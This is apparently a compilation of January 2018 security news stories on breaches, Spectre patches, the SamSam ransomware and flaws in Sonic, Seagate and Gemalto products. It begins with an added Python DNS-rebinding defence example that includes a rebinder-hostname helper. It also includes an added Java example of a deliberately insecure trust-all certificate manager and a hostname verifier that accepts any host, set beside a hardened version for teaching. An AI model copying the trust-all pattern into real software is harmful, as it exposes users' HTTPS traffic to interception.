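naming scheme. Added example, not Blizzard's or Ormandy's code."""
import ipaddress
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

AGENT_PORT = 1120  # port named in the reports; RPC handling below is invented


def rebinder_hostname(first_ip, second_ip, zone="rbndr.us"):
    """Encode two IPv4 addresses the way the rbndr.us test zone expects.

    Its resolver alternates between the two addresses on successive lookups,
    e.g. 127.0.0.1 / 199.241.29.227 -> 7f000001.c7f11de3.rbndr.us
    """
    def hex8(ip):
        return format(int(ipaddress.IPv4Address(ip)), "08x")
    return f"{hex8(first_ip)}.{hex8(second_ip)}.{zone}"


def host_header_allowed(host_header, port=AGENT_PORT):
    """Accept only Host values naming the loopback interface (and our port).

    An attacker domain that currently resolves to 127.0.0.1 still arrives with
    its own name in Host, so it is rejected; that is what defeats rebinding.
    """
    if not host_header:
        return False
    try:
        parts = urlsplit("//" + host_header)   # reuse the URL authority parser
        host, hport = parts.hostname, parts.port
    except ValueError:
        return False                            # malformed port or bracket
    if not host:
        return False
    if hport is not None and hport != port:
        return False
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False                            # any other DNS name


class AgentHandler(BaseHTTPRequestHandler):
    """Minimal stand-in for a localhost JSON-RPC agent that applies the check."""

    def do_POST(self):
        if not host_header_allowed(self.headers.get("Host")):
            self.send_error(403, "Host header not allowed")
            return
        length = int(self.headers.get("Content-Length", 0))
        request = json.loads(self.rfile.read(length) or b"{}")
        # Placeholder: a real agent would dispatch request["method"] here.
        reply = {"jsonrpc": "2.0", "id": request.get("id"),
                 "result": f"accepted call to {request.get('method')!r}"}
        body = json.dumps(reply).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    print("rebinder name:", rebinder_hostname("127.0.0.1", "199.241.29.227"))
    HTTPServer(("127.0.0.1", AGENT_PORT), AgentHandler).serve_forever()
```

With the server running, `curl -H 'Host: 7f000001.c7f11de3.rbndr.us:1120' -X POST http://127.0.0.1:1120/` gets a 403 while the same request with `Host: localhost:1120` is served, which is the observable difference between a rebinding victim and a legitimate local client. Binding the listener to 127.0.0.1 alone does not help, because the rebound request really does arrive on the loopback interface.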


Nearly Half of the Norway Population Exposed in HealthCare Data Breach
23.1.2018 thehackernews BigBrothers

Cybercriminals have stolen a massive trove of Norway's healthcare data in a recent data breach that likely affects more than half of the nation's population.
An unknown hacker or group of hackers managed to breach the systems of the Health South-East Regional Health Authority (RHF) and reportedly stole personal information and health records of some 2.9 million Norwegians out of the country's 5.2 million inhabitants.
Health South-East RHA is a healthcare organisation that manages hospitals in Norway’s southeast region, including Østfold, Akershus, Oslo, Hedmark, Oppland, Buskerud, Vestfold, Telemark, Aust-Agder and Vest-Agder.
The healthcare organisation announced the data breach on Monday after it had been alerted by HelseCERT, the Norwegian CERT for the healthcare sector, about "abnormal activity" against computer systems in the region.
HelseCERT also said the culprits behind the data breach are "advanced and professional" hackers, although it is still unknown whether they managed to exfiltrate data and, if so, how many people may have been affected.
So far there is also no evidence that the data theft has had any consequences for or effects on patient safety. However, the healthcare organisation said that security "measures had been taken to limit the damage caused by the burglary."
"We are in a phase where we try to get an overview. It's far too early to say how big the attack is. We are working to acquire knowledge of all aspects, " NorCERT director Kjetil Nilsen told Norwegian publication VG.
"Everything indicates that it is an advanced player who has the tools and ability to perform such an attack. It can be advanced criminals. There is a wide range of possibilities."
Why Do Hackers Want Your Health Data?
Digital healthcare has been growing to satisfy the demands of connected healthcare technology that provides better treatment and improved patient care.
We know that any organisation with a computer is at risk from cyber-attacks both from criminals wanting to extort money and state-sponsored hackers wanting to cause chaos.
Since the healthcare sector is part of the critical national infrastructure, alongside water, electricity and transport, it becomes an attractive target for hackers.
Believe it or not, your medical records are worth more to hackers than your stolen credit card details on the dark web markets.
Financial data has a finite lifespan, but the information contained in health care records—which includes names, birth dates, policy numbers, diagnosis codes, social security number and billing information—has a much longer shelf life and is rich enough for identity theft.
Fraudsters can use this data to create fake identities and do all kinds of illegal things in your name, combine a patient number with a false provider number to file fake claims with insurers, and even file fake tax returns using your stolen address, phone number and employment history.
How to Protect Yourself After a Data Breach?
If you are one of those affected by the healthcare breach, you will have to remain vigilant against fraud for the rest of your life, because the risk of identity theft is not short term, unlike credit card fraud.
You may follow the following steps to protect yourself:
1) Monitor Your Accounts: Watch for anyone using your information to take over or transfer money out of your existing accounts. Remember that thieves holding your stolen details can get through security questions such as the last four digits of your social security number and your street address. Also watch for any unauthorised activity or transfers on your current financial accounts.
2) File Your Taxes Early: With the stolen information in the hands, cyber thieves could hook your tax refund by filing your taxes early and claiming it for themselves. So, to avoid any such problems, file your taxes as early as possible.
3) Stay Vigilant: The foremost thing to protect against any breach is to stay vigilant, as nobody knows when or where your stolen identities will be used. So, affected consumers will simply have to stay mindful forever.


Linus Torvalds calls the Linux Spectre patches “UTTER GARBAGE”
23.1.2018 securityaffairs
Vulnerability

Linus Torvalds has harshly criticized the patches Intel issued for the Spectre variant 2 flaw affecting its processors.
Security experts are harshly criticizing the patches Intel issued for the Spectre variant 2 flaw affecting its processor chips.

Intel has decided not to disable the branch prediction feature in upcoming chips until it implements design changes in the microarchitecture; this means the shipped chips will be “vulnerable by default”, with a protection flag that software can set.

Intel published a technical note about the mitigation of the Spectre flaw

Intel explained its approach in its technical note on Spectre mitigation (“Speculative Execution Side Channel Mitigations”): the tech giant addresses the issue with an opt-in IBRS_ALL bit (IBRS stands for Indirect Branch Restricted Speculation).

In an email to the Linux kernel mailing list, Torvalds expressed his disappointment, calling the Linux Spectre patches “UTTER GARBAGE”:

“All of this is pure garbage. Is Intel really planning on making this shit architectural?” he wrote. “Has anybody talked to them and told them they are f*cking insane? Please, any Intel engineers here – talk to your managers.”

“They do literally insane things. They do things that do not make sense … The patches do things that are not sane.

WHAT THE F*CK IS GOING ON?”

Spectre patches

Indirect Branch Restricted Speculation (IBRS), along with Single Thread Indirect Branch Predictors (STIBP) and Indirect Branch Predictor Barrier (IBPB), are the controls meant to prevent abuse of the branch predictor and exploitation of the flaw.

Torvalds speculates that Intel’s decision to address the issue this way is mainly motivated by the intention to avoid legal liability: recalling two decades of flawed chips would have a catastrophic impact on the tech giant.

Torvalds explained that the performance cost of using IBRS on existing hardware is so severe that no one will set the hardware capability bits.

“Nobody sane will use them, since the cost is too damn high,” he said.

Of course, the impact on the performance depends on the hardware and workload involved.

Let me close with an excerpt from Torvalds’s email:

“That’s part of the big problem here. The speculation control cpuid stuff shows that Intel actually seems to plan on doing the right thing for meltdown (the main question being _when_). Which is not a huge surprise, since it should be easy to fix, and it’s a really honking big hole to drive through. Not doing the right thing for meltdown would be completely unacceptable.

So the IBRS garbage implies that Intel is _not_ planning on doing the right thing for the indirect branch speculation.

Honestly, that’s completely unacceptable too.” wrote Torvalds.

“Have you _looked_ at the patches you are talking about? You should have – several of them bear your name.

The patches do things like add the garbage MSR writes to the kernel entry/exit points. That’s insane. That says “we’re trying to protect the kernel”. We already have retpoline there, with less overhead.

So somebody isn’t telling the truth here. Somebody is pushing complete garbage for unclear reasons. Sorry for having to point that out.

If this was about flushing the BTB at actual context switches between different users, I’d believe you. But that’s not at all what the patches do.

As it is, the patches are COMPLETE AND UTTER GARBAGE.

They do literally insane things. They do things that do not make sense. That makes all your arguments questionable and suspicious. The patches do things that are not sane.

WHAT THE F*CK IS GOING ON?”


Three Sonic apps in the Google Play are leaking data to uncertified servers
23.1.2018 securityaffairs Android

According to a researcher from security firm Pradeo, three Sonic apps in the Google Play published by SEGA leak users’ data to uncertified servers.
According to a researcher from security firm Pradeo, some game applications in the Google Play published by SEGA leak users’ data to uncertified servers.

The Android apps are Sonic Dash, Sonic the Hedgehog™ Classic, and Sonic Dash 2: Sonic Boom, which together have been downloaded millions of times.

The expert discovered that the apps are leaking users’ geolocation and device data to suspicious servers, thereby posing a privacy threat to mobile gamers.

“Pradeo’s Lab discovered that some game applications in the Google Play published by SEGA, the famous video games developer and publisher, access and leak users’ geolocation and device data. Hundreds of millions of users are concerned by these data privacy violations.” states the blog post published by Pradeo.


The Sonic apps send data to an average of 11 remote servers, three of which are not certified. Most of the servers evidently collect data for marketing purposes, but the expert observed that two of the three uncertified servers are linked to a potentially unwanted library dubbed Android/Inmobi.D.

Android.InMobi is classified as an advertisement library that is bundled with certain Android applications.

The expert discovered that the Sonic apps also leak mobile network information, including the service provider name, network type, and device information (i.e. manufacturer, commercial name, battery level, the maximum level of the battery, and operating system version number).

The researchers at Pradeo also conducted a vulnerability assessment of the three Sonic apps and discovered an average of 15 OWASP (Open Web Application Security Project) flaws per app.

Experts discovered two critical flaws, X.509TrustManager and PotentiallyByPassSslConnection, that could be exploited by attackers to mount man-in-the-middle attacks because SSL certificate validation errors are not checked.

“Unsafe implementation of the interface X509TrustManager. Specifically, the implementation ignores all SSL certificate validation errors when establishing an HTTPS connection to a remote host, thereby making your app vulnerable to man-in-the-middle attacks. An attacker could read transmitted data (such as login credentials) and even change the data transmitted on the HTTPS connection.” reads the description for the X.509TRUSTMANAGER flaw, while the POTENTIALLY_BYPASS SSL_CONNECTION is described as:

“The implementation bypasses all SSL certificate validation errors when establishing an HTTPS connection to a remote host, thereby making your app vulnerable to man-in-the-middle attacks. An attacker could read transmitted data (such as login credentials) and even change the data transmitted on the HTTPS connection.”
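As an added illustration (not code from the Sonic apps or from Pradeo’s report), the trust-all X509TrustManager pattern that the descriptions above refer to, placed beside the platform default trust manager and hostname verifier an app should use instead; the class and helper names are mine, and the empty certificate chain is a constructed sample input.

```java
import java.security.KeyStore;
import java.security.KeyStoreException;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

/**
 * Added example, not code from the apps discussed above. Contrasts the
 * "ignore every certificate error" trust manager pattern with the platform
 * default trust manager that an HTTPS client should rely on.
 */
public final class TrustManagerAudit {

    /**
     * VULNERABLE: the pattern the assessment flags. Both check methods return
     * without inspecting the chain, so a man-in-the-middle proxy presenting any
     * certificate is trusted and can read or alter the HTTPS traffic.
     */
    static final class TrustAllManager implements X509TrustManager {
        @Override public void checkClientTrusted(X509Certificate[] chain, String authType) { }
        @Override public void checkServerTrusted(X509Certificate[] chain, String authType) { }
        @Override public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
    }

    /** VULNERABLE companion often found next to it: accepts any host name. */
    static final HostnameVerifier TRUST_ANY_HOST = (hostname, session) -> true;

    /** HARDENED: the default trust manager, built from the system CA store. */
    static X509TrustManager platformTrustManager()
            throws NoSuchAlgorithmException, KeyStoreException {
        TrustManagerFactory tmf =
                TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null); // null key store selects the platform trust store
        for (TrustManager tm : tmf.getTrustManagers()) {
            if (tm instanceof X509TrustManager) {
                return (X509TrustManager) tm;
            }
        }
        throw new IllegalStateException("no X509TrustManager available");
    }

    /** What the flagged apps effectively do: install the trust-all manager. */
    static SSLContext insecureContext() throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { new TrustAllManager() }, null);
        return ctx;
    }

    /** What they should do: keep chain validation with the platform manager. */
    static SSLContext hardenedContext() throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { platformTrustManager() }, null);
        return ctx;
    }

    /** Reports whether a manager lets a server chain through without an error. */
    static boolean acceptsChain(X509TrustManager tm, X509Certificate[] chain) {
        try {
            tm.checkServerTrusted(chain, "RSA");
            return true;
        } catch (CertificateException | IllegalArgumentException e) {
            // The platform manager rejects empty, unsigned or untrusted chains here.
            return false;
        }
    }

    /** Hardened connection setup: validated chain plus default host name check. */
    static void configure(HttpsURLConnection conn) throws Exception {
        conn.setSSLSocketFactory(hardenedContext().getSocketFactory());
        conn.setHostnameVerifier(HttpsURLConnection.getDefaultHostnameVerifier());
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a chain with no certificates at all. The trust-all
        // manager waves it through; the platform manager refuses it.
        X509Certificate[] emptyChain = new X509Certificate[0];
        System.out.println("trust-all manager accepts empty chain: "
                + acceptsChain(new TrustAllManager(), emptyChain));
        System.out.println("platform manager accepts empty chain: "
                + acceptsChain(platformTrustManager(), emptyChain));
    }
}
```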

I suggest you read the post to discover the remaining issues and the risks they pose to users.


Seagate Patches Flaws in Personal Cloud, GoFlex Products
22.1.2018 securityweek
Vulnerability
Seagate recently patched several vulnerabilities discovered by researchers in the company’s Personal Cloud and GoFlex products, but some weaknesses impacting the latter remain unfixed.

GoFlex Home vulnerabilities

In late September 2017, researcher Aditya K. Sood discovered vulnerabilities that can be exploited for cross-site scripting (XSS) and man-in-the-middle (MitM) attacks in Seagate’s GoFlex Home network-attached storage (NAS) product.

GoFlex users are provided a web service, accessible at seagateshare.com, that allows them to remotely manage the product and upload files to the cloud. The service can be accessed using the name of the device, a username, and a password. An HTTP server present in the GoFlex firmware requires port forwarding on the user’s router in order to connect to the web service.

Sood discovered that the embedded server still supports SSLv2 and SSLv3, and the seagateshare.com service supports SSLv3. SSLv2 and SSLv3 are obsolete protocols that are known to be vulnerable to MitM attacks, including via the methods known as DROWN and POODLE.

The expert has identified more than 50,000 Seagate devices – hosted on unique IP addresses – that have SSLv2 and SSLv3 enabled.

Sood also noticed that the unique name (device_id) of each device is not difficult to find. During the tests he conducted, the expert managed to collect more than 17,000 unique device IDs.

Another security hole found by the researcher is an XSS affecting the seagateshare.com website. An attacker could have exploited this vulnerability to execute malicious code in the context of a user’s browsing session by getting the victim to click on a specially crafted link.

While Seagate has fixed the XSS vulnerability, the company told Sood it does not plan on addressing the issue related to the use of SSLv2 and SSLv3.

The researcher disclosed his findings on Monday. Additional technical details on the vulnerabilities are available on his blog.


Securify researcher Yorick Koster also disclosed recently a couple of vulnerabilities he discovered in Seagate products. Specifically, he found that Personal Cloud NAS devices are affected by command injection and file deletion flaws.

The security holes affect the Seagate Media Server application, which allows users to easily access their photos, music and movies. The app can be accessed without authentication, and unauthenticated users can upload files using a Public folder.

The command injection vulnerabilities, tracked as CVE-2018-5347, allow an unauthenticated attacker to run arbitrary commands with root privileges. The security holes can be exploited remotely via cross-site request forgery (CSRF) attacks even if a device is not directly connected to the Internet.

Koster also found that the Media Server app is affected by a vulnerability that allows an unauthenticated attacker to delete arbitrary files and folders from the NAS device. Since CSRF protections are missing, this flaw can also be exploited remotely by getting the targeted user to access a specially crafted website.

The vulnerabilities discovered by Koster were patched by Seagate on December 11 with the release of firmware version 4.3.18.0. Separate advisories detailing the command injection and file deletion flaws, including proof-of-concept (PoC) code, were published earlier this month.


Intel Halts Spectre, Meltdown CPU Patches Over Unstable Code
22.1.2018 securityweek
Vulnerability
Intel on Monday said that users should stop deploying patches for the “Spectre” and “Meltdown” chip vulnerabilities disclosed by researchers earlier this month, saying the patches could cause problems in affected devices, including higher than expected reboots and other “unpredictable” system behavior.

The US chip giant recommended that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions of the patches.

"We have now identified the root cause of the reboot issue impacting Broadwell and Haswell platforms, and made good progress in developing a solution to address it," Navin Shenoy, Intel data center group executive vice president, wrote in a security update.

"We ask that our industry partners focus efforts on testing early versions of the updated solution so we can accelerate its release," Shenoy added.

Last Wednesday, Intel shared information on the performance impact of the initial Meltdown and Spectre patches on data centers, and the company warned customers that systems with several types of processors may experience more frequent reboots after firmware updates are installed.

Shenoy said that Intel expects to share more details on the timing of new patches later this week.

As technology firms rush out fixes to address the security risks, many of the updates have turned out to be unstable.

Red Hat has also decided to pull microcode patches for one variant of the Spectre exploit after users complained that updates had caused their systems to stop booting.

The updates initially released by Microsoft caused some systems using AMD processors to stop booting. Some systems running Ubuntu also failed to boot after Canonical’s first round of updates was installed.

Several industrial control systems (ICS) vendors have advised customers not to apply them before conducting thorough tests.

VMware also decided to delay new releases of microcode updates until Intel addresses these problems.


SamSam Ransomware Attacks Hit Healthcare Firms
22.1.2018 securityweek
Ransomware
Two SamSam Ransomware Healthcare Attacks, Two Variants, and Two Different Results

Earlier this month, Hancock Health, headquartered in Greenfield, Indiana, was infected with the SamSam ransomware. This past weekend, Allscripts -- a major electronic health record (EHR) company headquartered in Chicago, IL -- confirmed that it had also been hit by ransomware, which it described as a SamSam (also known as Samas) variant.

The methodologies employed in each attack are different. SamSam is not usually delivered by email phishing; it is more often introduced after the target has already been breached. This method was described in the Symantec Internet Security Threat Report V22: "In the case of SamSam (Ransom.SamSam) the attackers’ initial point of entry was a public-facing web server. They exploited an unpatched vulnerability to compromise the server and get a foothold on the victim’s network."

This bears a strong similarity to what we know about the attack against Hancock Health, Greenfield, disclosed last week. The Greenfield Reporter wrote, "...the hacker gained access to the system by using the hospital’s remote-access portal, logging in with an outside vendor’s username and password. The attack was not the result of an employee opening a malware-infected email."

On Jan. 15, Hancock released a statement saying, "At approximately 9:30 PM on Thursday, January 11, 2018, an attack on the information systems of Hancock Health was initiated by an as-yet unidentified criminal group."

One day later it announced that it had decided to pay the ransom. CEO Steve Long said, "Restoring from backup was considered, though we made the deliberate decision to pay the ransom to expedite our return to full operations.” Payment was made on Friday, January 12, and, "By Monday, January 15, 2018, critical systems were restored to normal production levels and the hospital was back online."

Last Friday (Jan. 19) Long posted a more detailed description of the events. He confirmed that the malware was SamSam, and that it had been a supply chain attack via a provider of ICS equipment to the hospital. The attackers targeted Hancock's remote emergency IT backup facility and used the connections from there to gain access to the primary facility -- targeting files associated with the most critical information systems in the hospital.

Long notes that when the hospital made the business decision to pay the ransom (set at 4 bitcoins, thought to be worth $55,000 at the time), the hospital believed that it could recover its files from backup, but that the time and cost involved made it more efficient to pay the ransom. Now, he added, "Several days later it was learned that, though the electronic medical record backup files had not been touched, the core components of the backup files from all other systems had been purposefully and permanently corrupted by the hackers."

Forensic firm Pondurance suggested that no patient data had been stolen, while the FBI confirmed that the SamSam group are more interested in receiving the ransom than in harvesting patient data.

The more recent attack against Allscripts occurred late last week. Allscripts emailed its clients on Jan. 18: "...early on the morning of January 18, we became aware of a ransomware incident that has impacted our hosted Professional EHR service and our Electronic Prescription of Controlled Substances ("EPCS") service, which are hosted in our Raleigh and Charlotte, NC data centers. According to industry reports, we are one of dozens of companies impacted by this attack, which is a variant of the SamSam ransomware."

Next day another email stated, "Material progress has been made to restore service as we now have access to data and services that were previously subject to the SamSam malware. We are in the process of cleaning impacted systems and services to ensure they will be operational once we are able to bring the services back online."

There has been no mention of any ransom payment, and no public discussion of the attack from Allscripts. The information above comes from copies of the emails posted to Reddit.

If the malware really is a variant of the SamSam ransomware, then it marks a divergence from its usual use. CSO Online reported Saturday, "The variant of SamSam that infected Allscripts was a new variant unrelated to the version of SamSam that infected systems at Hancock Health Hospital in Greenfield, Indiana and Adams Memorial Hospital in Decatur, Indiana... Allscripts said that all appearance this was commodity malware and that the company wasn’t directly targeted."

The fact that 'material progress' was made so quickly without any ransom payment suggests that recovery is coming from Allscripts' backups rather than from decryption keys. This further supports the description of the attack as a commodity malware attack rather than a targeted attack like the one on Hancock Health. In the targeted attack, the attackers destroyed backups before infecting files; in the Allscripts attack, backup files were left intact.

These differences make it uncertain at this stage whether the same cybercriminals were behind both attacks, or whether the attacks have come from separate groups. Certainly, the financial success of the targeted attack compared to the financial failure of the commodity attack justifies the targeted approach in criminal terms.

SecurityWeek has approached Allscripts for a comment on the attack, and will update this story with any response.


Gemalto Licensing Tool Exposes ICS, Corporate Systems to Attacks
22.1.2018 securityweek ICS

A significant number of industrial and corporate systems may be exposed to remote attacks due to the existence of more than a dozen vulnerabilities in a protection and licensing product from Gemalto.

Gemalto Sentinel LDK is a software licensing solution used by many organizations worldwide on both their enterprise and industrial control systems (ICS) networks. In addition to software components, the solution provides hardware-based protection, specifically a SafeNet Sentinel USB dongle that users connect to a PC or server when they want to activate a product.

Researchers at Kaspersky Lab discovered that when the token is attached to a device, the necessary drivers are installed – either downloaded by Windows or provided by third-party software – and port 1947 is added to the list of exceptions in the Windows Firewall. The port remains open even after the USB dongle has been removed, allowing remote access to the system.

Experts discovered a total of 14 vulnerabilities in Sentinel components, including ones that allow denial-of-service (DoS) attacks, arbitrary code execution with system privileges, and capturing NTLM hashes. Since port 1947 allows access to the system, these flaws can be exploited by a remote attacker.

Kaspersky decided to analyze the product after the company’s ICS CERT team repeatedly encountered it during penetration testing assignments.

Malicious actors can scan the network for port 1947 to identify remotely accessible devices or, if they have physical access to the targeted machine, they can connect the USB dongle – even if the computer is locked – in order to make it remotely accessible.

The Gemalto product also includes an API that can be used to remotely enable and disable the administrator interface and change settings, including proxy settings for obtaining language packs. Changing the proxy allows an attacker to obtain the NTLM hash for the user account running the licensing software process.

Eleven vulnerabilities were discovered by Kaspersky in late 2016 and early 2017, and three others were found by June 2017. Gemalto has been notified and the company has implemented fixes with the release of version 7.6, but Kaspersky is not entirely happy with how the vendor has handled the situation. The first round of flaws was only resolved in late June 2017 and Gemalto did not properly communicate to customers the risks posed by these vulnerabilities – several software developers using the license management solution told Kaspersky they had not been aware of the security holes and continued using vulnerable versions.


In addition to installing the latest version of the Sentinel driver, Kaspersky has advised users to close port 1947 if it’s not needed for regular activities.

While the exact number of devices using this Gemalto product is unknown, Kaspersky believes it could be millions. A 2011 study by Frost and Sullivan showed that the SafeNet Sentinel had a 40 percent share in the license control solutions market in North America and 60 percent in Europe.

The vulnerable Gemalto software is found in the products of several major companies, including ABB, General Electric, HP, Cadac Group, Siemens, and Zemax.

Last week, ICS-CERT and Siemens warned that more than a dozen versions of the SIMATIC WinCC Add-On were affected by three critical and high severity vulnerabilities introduced by the use of Gemalto software. Siemens said the flaws, two of which are related to how language packs are processed, allow DoS attacks and arbitrary code execution.

Siemens told customers that the vulnerable Gemalto software is used in SIMATIC WinCC add-ons released in 2015 and earlier.

“Given how widespread this license management system is, the possible scale of consequences is very large, because these tokens are used not only in regular corporate environments, but also in critical facilities with strict remote access rules. The latter could easily be broken with the help of the issue which we discovered to be putting critical networks in danger,” warned Vladimir Dashchenko, head of the vulnerability research group at Kaspersky ICS CERT.


Can Biometrics Solve the Authentication Problem?
22.1.2018 securityweek Safety
Are Biometrics as a Form of Authentication Over-hyped and Unreliable?

When Apple introduced the Touch ID fingerprint access button, commentators believed it would kick-start the ever-promising, never-quite-delivering biometric market. But Touch ID was defeated by hackers within days. When Apple introduced the FaceID biometric, the same happened – it was defeated within weeks. In November 2017, F-Secure demonstrated that Android’s Trusted Face Smart Lock can be defeated by a selfie. Also in November, researchers at the University of Eastern Finland concluded that voice impersonators can fool speaker/voice recognition systems.

There is probably no physical biometric factor that has not been defeated by hackers or researchers. Which begs the question: are biometrics as a form of authentication over-hyped and unreliable? Can they possibly provide an alternative to the much denigrated password?

Biometrics in use

Large-scale use of biometric authentication is primarily tied to smartphones. The wide range of sensors built into these handheld and ubiquitous devices makes them an ideal tool for face and iris recognition (camera), voice (microphone), and touch (fingerprint). This authenticates the user to the device, allowing further authorized access to other devices via the phone (although this does not, in itself, confirm that it is the authenticated user who is still operating the phone).

Banks are increasingly using voice and face recognition via smartphones for mobile banking purposes. Barclays introduced phone-based voice authentication, and HSBC allowed selfie-based face authentication in 2016.

Biometrics are also used in stand-alone situations, where they can be used to access restricted buildings or rooms. For example, in December 2017, Los Angeles Airport started trialing facial biometrics to speed out-bound passenger flow. The passenger’s facial image is compared to the facial image captured during the immigration process to prove identity.

In such circumstances, biometrics are very popular; but we need to differentiate between consumer smartphone-based biometrics and corporate usage. Biometrics are not currently used widely within industry. The main reasons are cost, possible privacy issues, and because it cannot be guaranteed that every member of the workforce has a smartphone.

Biometric strengths

Biometric authentication has several distinct advantages over passwords. These include:

Ease of use – “Biometrics are incredibly popular with users,” explains Shane Young, president & CEO of inBay Technologies. “Inherent biological... features are convenient: they are part of who we are, always with us and in most cases, we don’t have to think too much to use them (unlike remembering a password).”

Numerous surveys have confirmed this. A July 2016 survey conducted by Visa said two-thirds of Europeans would welcome the use of biometrics in payments. An August 2017 survey by Unisys suggests that 68% of users would trust organizations more if they were to use biometric authentication; 63% believe it is more secure than PIN and password; and 57% believe fingerprints to be the most secure form of authentication.

Can’t be lost – Associated with ‘ease of use’ is the idea that, unlike passwords, biometrics can be neither lost nor forgotten because the user is the biometric. This is true, but needs two qualifications. Firstly, if the biometric device is a smartphone, then the phone itself can – and often is – lost or stolen. Secondly, like a password, it is the device that is authenticated at a point in time. Subsequent use of an authenticated device could be by anyone. In reality, the ‘cannot-be-lost’ argument offers little advantage for smartphone biometrics over passwords other than it is easier to forget a complex password than to lose a personal device, and it is easier to use than inputting a complex password.

Automatically unique – Biometrics are automatically unique to each user. This argument might not hold up against detailed scientific analysis – even fingerprints cannot be guaranteed to be 100% unique. Voices can be imitated and twins can have identical faces – but in general, the risk of such ‘collisions’ occurring naturally is very small.

Biometric Weaknesses

Biometric authentication also has several weaknesses. These include:

Additional cost – A biometric solution cannot be implemented without incurring additional cost. “Anytime you require hardware, you incur additional cost – both monetary costs and costs in convenience (and therefore, cost to user adoption),” explains Ian Paterson, CEO of Plurilock. “Fingerprints require fingerprint readers, facial recognition requires special infrared cameras to work well, and retinal scans are even more cumbersome.”

Susceptibility to cloning or coercion – No biometric has yet proven itself to be proof against cloning. “Mainstream biometrics really means mobile devices, where – for the most part – they have only proven reliable enough at scale to be a convenience feature, used in parallel with the passcode as backup,” says security researcher and consultant, Stewart Twynham. “Even Tim Cook’s keynote announcement of Face ID came with the caveat that you should protect your data with a passcode if you have an ‘evil twin’.”

The implication is that biometrics are only as strong as the built-in biometrics found in the majority of contemporary smartphones – and these biometrics are routinely spoofed by researchers and hackers within days or weeks of their release.

“Whether a particular biometric method is useful or not depends on the sensor quality and ease of duplicating a particular biometric,” comments Jarno Niemela, lead researcher at F-Secure Labs. “For example fingerprints are a field where the attacker has significant advantage, since they are easy to copy and can be obtained from about anything that a person has been handling, or even from a photo.”

A related weakness in smartphone-based biometrics comes with the nature of smartphones – their mobility. This could allow a physical attacker to coerce the user into authenticating the device remotely. Since it is the device rather than the user of the device that is authenticated for mobile apps (whether they are banking apps or corporate access), a physical attacker such as a burglar could employ user-coercion (in crypto terms, aka ‘rubber-hose decryption’) to defeat biometric authentication.

Difficult to change – Despite their apparent immutability, biometric templates may need to be changed – and this is considerably more complex and costly than simply changing a password. There are two primary scenarios: theft of the biometric templates, and the aging of the user.

“Biometric data,” comments Carl Leonard, principal security analyst with Forcepoint, “is arguably more valuable than passwords since biometrics are, on the whole, immutable. The breach of the US Office of Personnel Management in 2015,” he adds, “included personal data of individuals including fingerprints.”

“The big problem with biometrics,” says Joseph Carson, chief security scientist at Thycotic, “is when they are compromised you cannot change them; it is like a hard-coded password which is a bad idea to use in today’s security world.”

The second scenario is an unknown quantity. Biometric characteristics actually do change over time. For example, fingerprints get worn through incessant use and/or injury, and voices change with age and illness. Where biometrics are already in use, their use is too recent to know whether this will prove a problem over time. Machine learning techniques could be used to adapt the template slowly with minute changes as they occur, but this simply adds more complexity and cost to the solution.

Privacy push-back – Despite consumer acceptance of smartphone-based biometrics, there is less overwhelming acceptance from corporate users. Many such users are unhappy about handing permanent personal data to what might prove to be a temporary employer. Such personal and perhaps conflicting attitudes to the private nature of biometrics are reflected in some contemporary legal concerns.

For example, comments Darren Abernethy, senior global privacy manager at TrustArc, “Some laws, such as the EU’s rapidly approaching General Data Protection Regulation (GDPR, which takes effect May 25, 2018), treat newly defined ‘biometric data’ as in essence sensitive personal information (SPI). The mandatory use of biometric data for authentication purposes creates the ironic situation where an individual must offer sensitive information – and likely separately provide explicit consent for its processing – in order to access a particular piece of hardware/software that itself may not otherwise contain SPI.”

This even tips over into constitutional issues. “There is a relevant Constitutional Fifth Amendment consideration with biometric data as well,” adds Abernethy; “namely, that whereas the government forcing an individual to reveal a traditional text-based password would amount to impermissible compelled testimonial self-incrimination, the same is not true with respect to a fingerprint.” In law enforcement scenarios, biometric authentication of smartphones is less secure than ‘forgettable’ passwords, since the user can be compelled to unlock the phone with biometrics; but not with a password.

Biometric Viewpoints

For at least a decade, each new year has started with predictions that this will be the year in which biometrics takes over authentication. It hasn’t happened yet. Nevertheless, the obvious advantages of biometrics remain compelling. The predictions continue; but have become more tempered.

“In 2018,” TrustArc’s Abernethy told SecurityWeek, “we’ll see less emphasis on traditional passwords and more on ways to achieve security via 2-factor authentication techniques involving biometric solutions like voice recognition, facial scans and fingerprints. For security vendors, the storage and record-keeping stakes are higher to protect biometric data because contrary to a credit card number that can be discontinued, you can’t replace a person’s facial structure with a new one once a facial scan is compromised.”

The biggest advantage is that biometrics reduce user ‘friction’; that is, the amount of effort required to properly authenticate yourself before using a system. The greater the friction, the greater the likelihood that the user will try to circumvent the controls that inhibit easy working. Biometrics do not eliminate friction, but they drastically reduce it.

The biggest disadvantages include cost, complexity, and a lack of clear proof that biometrics cannot be circumvented or defeated. More sophisticated biometric sensor devices can improve their reliability, but that will always come with a cost. “Next improvement in fingerprint scanning,” comments F-Secure’s Niemela, “will be sensors that are capable of also identifying the blood vessels in fingers, in which case just duplicating a visible print will not be enough.”

A 3D facial recognition system with infrared scanning would also improve facial scans. “With infrared cameras,” he adds, “cold objects (such as a photo image) will not show at all, or at least not correctly; and even a mask will very likely present a distorted thermal image.”

